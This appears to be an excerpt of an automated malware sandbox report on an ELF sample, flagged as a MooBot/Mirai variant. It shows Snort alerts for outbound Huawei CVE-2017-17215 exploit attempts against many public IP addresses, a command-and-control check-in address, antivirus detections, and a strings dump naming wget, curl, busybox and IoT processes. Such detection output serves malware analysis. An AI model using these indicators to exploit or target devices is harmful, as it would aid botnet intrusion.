                      Source Port:53918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.544436+0200
                      SID:2835222
                      Source Port:40802
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.226483+0200
                      SID:2835222
                      Source Port:59562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.277827+0200
                      SID:2835222
                      Source Port:36626
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.119631+0200
                      SID:2835222
                      Source Port:41692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:04.993704+0200
                      SID:2027339
                      Source Port:44076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.370706+0200
                      SID:2027339
                      Source Port:45716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.529461+0200
                      SID:2027339
                      Source Port:36142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.661808+0200
                      SID:2835222
                      Source Port:56996
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.479146+0200
                      SID:2027339
                      Source Port:40144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.482947+0200
                      SID:2027339
                      Source Port:54976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.603420+0200
                      SID:2027339
                      Source Port:52276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.921226+0200
                      SID:2027339
                      Source Port:33518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.814981+0200
                      SID:2027339
                      Source Port:41562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.180699+0200
                      SID:2835222
                      Source Port:50560
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.282646+0200
                      SID:2835222
                      Source Port:34536
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.423367+0200
                      SID:2835222
                      Source Port:53842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.164966+0200
                      SID:2835222
                      Source Port:47490
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.199072+0200
                      SID:2027339
                      Source Port:58646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.821969+0200
                      SID:2835222
                      Source Port:57128
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.508899+0200
                      SID:2835222
                      Source Port:43440
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.508899+0200
                      SID:2835222
                      Source Port:34472
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.266022+0200
                      SID:2027339
                      Source Port:60010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.857203+0200
                      SID:2027339
                      Source Port:60200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.539093+0200
                      SID:2835222
                      Source Port:51376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.524794+0200
                      SID:2835222
                      Source Port:54260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.001632+0200
                      SID:2027339
                      Source Port:43534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.208769+0200
                      SID:2835222
                      Source Port:53310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.199737+0200
                      SID:2835222
                      Source Port:37284
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.488326+0200
                      SID:2835222
                      Source Port:57480
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.528850+0200
                      SID:2027339
                      Source Port:60144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.579365+0200
                      SID:2027339
                      Source Port:52872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.095698+0200
                      SID:2835222
                      Source Port:36886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.216912+0200
                      SID:2835222
                      Source Port:43482
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:01.904354+0200
                      SID:2835222
                      Source Port:38354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.160329+0200
                      SID:2835222
                      Source Port:35110
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: faBNhIKHq4.elfAvira: detected
                      Source: faBNhIKHq4.elfVirustotal: Detection: 56%Perma Link
                      Source: faBNhIKHq4.elfString: Content-Length: abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinernetstatwgetcurlbusybox/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ3f

                      Networking

                      barindex
                      Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:32848 -> 15.235.203.214:2466
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36734 -> 157.189.55.135:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36734 -> 157.189.55.135:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48860 -> 157.115.56.95:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48860 -> 157.115.56.95:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33462 -> 41.107.86.189:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33462 -> 41.107.86.189:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45112 -> 157.87.181.134:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45112 -> 157.87.181.134:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40282 -> 23.141.91.228:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40282 -> 23.141.91.228:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40788 -> 157.147.238.186:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40788 -> 157.147.238.186:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48734 -> 41.174.115.244:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48734 -> 41.174.115.244:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54222 -> 37.80.86.165:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54222 -> 37.80.86.165:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42510 -> 173.155.49.17:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42510 -> 173.155.49.17:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53130 -> 157.110.226.143:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53130 -> 157.110.226.143:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34064 -> 221.200.167.164:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34064 -> 221.200.167.164:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55530 -> 157.37.107.134:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55530 -> 157.37.107.134:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41094 -> 157.66.238.102:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41094 -> 157.66.238.102:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59050 -> 203.201.15.112:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59050 -> 203.201.15.112:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46136 -> 197.12.204.52:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46136 -> 197.12.204.52:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34536 -> 197.76.203.13:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34536 -> 197.76.203.13:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36278 -> 157.203.14.217:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36278 -> 157.203.14.217:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52728 -> 125.230.182.28:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52728 -> 125.230.182.28:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49188 -> 197.166.141.245:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49188 -> 197.166.141.245:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37174 -> 157.233.134.27:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37174 -> 157.233.134.27:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52906 -> 157.119.223.145:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52906 -> 157.119.223.145:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56886 -> 17.113.7.103:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56886 -> 17.113.7.103:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44014 -> 143.179.199.146:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44014 -> 143.179.199.146:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42650 -> 47.7.162.229:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42650 -> 47.7.162.229:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58196 -> 197.77.131.53:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58196 -> 197.77.131.53:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44052 -> 197.23.80.245:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44052 -> 197.23.80.245:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47068 -> 197.30.15.103:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47068 -> 197.30.15.103:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47794 -> 41.166.85.150:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47794 -> 41.166.85.150:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44040 -> 41.242.31.133:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44040 -> 41.242.31.133:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38000 -> 41.143.61.103:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38000 -> 41.143.61.103:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38628 -> 157.240.255.134:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38628 -> 157.240.255.134:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43126 -> 197.4.26.126:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43126 -> 197.4.26.126:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49974 -> 197.231.189.109:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49974 -> 197.231.189.109:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37348 -> 86.49.143.0:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37348 -> 86.49.143.0:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59124 -> 157.236.245.35:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59124 -> 157.236.245.35:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47982 -> 197.32.17.115:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47982 -> 197.32.17.115:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:32888 -> 41.210.186.227:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:32888 -> 41.210.186.227:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52450 -> 41.214.240.131:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52450 -> 41.214.240.131:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40150 -> 41.226.72.201:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40150 -> 41.226.72.201:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48608 -> 175.193.29.172:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48608 -> 175.193.29.172:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52232 -> 197.155.27.254:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52232 -> 197.155.27.254:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46632 -> 197.17.13.46:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46632 -> 197.17.13.46:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57708 -> 41.143.175.164:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57708 -> 41.143.175.164:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37826 -> 41.76.26.43:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37826 -> 41.76.26.43:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41818 -> 207.93.222.13:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41818 -> 207.93.222.13:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43680 -> 157.254.68.190:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43680 -> 157.254.68.190:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33418 -> 197.127.202.249:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33418 -> 197.127.202.249:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35138 -> 197.213.7.238:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35138 -> 197.213.7.238:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44458 -> 157.170.128.9:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44458 -> 157.170.128.9:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43176 -> 157.215.252.1:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43176 -> 157.215.252.1:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42574 -> 41.240.149.129:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42574 -> 41.240.149.129:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53302 -> 157.143.196.120:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53302 -> 157.143.196.120:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56366 -> 197.221.173.151:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56366 -> 197.221.173.151:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57502 -> 157.189.184.171:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57502 -> 157.189.184.171:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55506 -> 157.6.221.99:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55506 -> 157.6.221.99:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47684 -> 41.214.148.214:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47684 -> 41.214.148.214:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47728 -> 41.6.98.70:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47728 -> 41.6.98.70:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39456 -> 57.35.73.126:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39456 -> 57.35.73.126:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53842 -> 197.55.83.122:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53842 -> 197.55.83.122:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56808 -> 197.138.137.217:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56808 -> 197.138.137.217:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43520 -> 61.117.29.155:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43520 -> 61.117.29.155:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50602 -> 157.15.115.232:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50602 -> 157.15.115.232:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36746 -> 41.173.160.14:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36746 -> 41.173.160.14:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53230 -> 46.47.224.132:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53230 -> 46.47.224.132:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47604 -> 197.178.33.225:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47604 -> 197.178.33.225:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51880 -> 132.70.95.60:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51880 -> 132.70.95.60:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49826 -> 41.65.251.158:37215
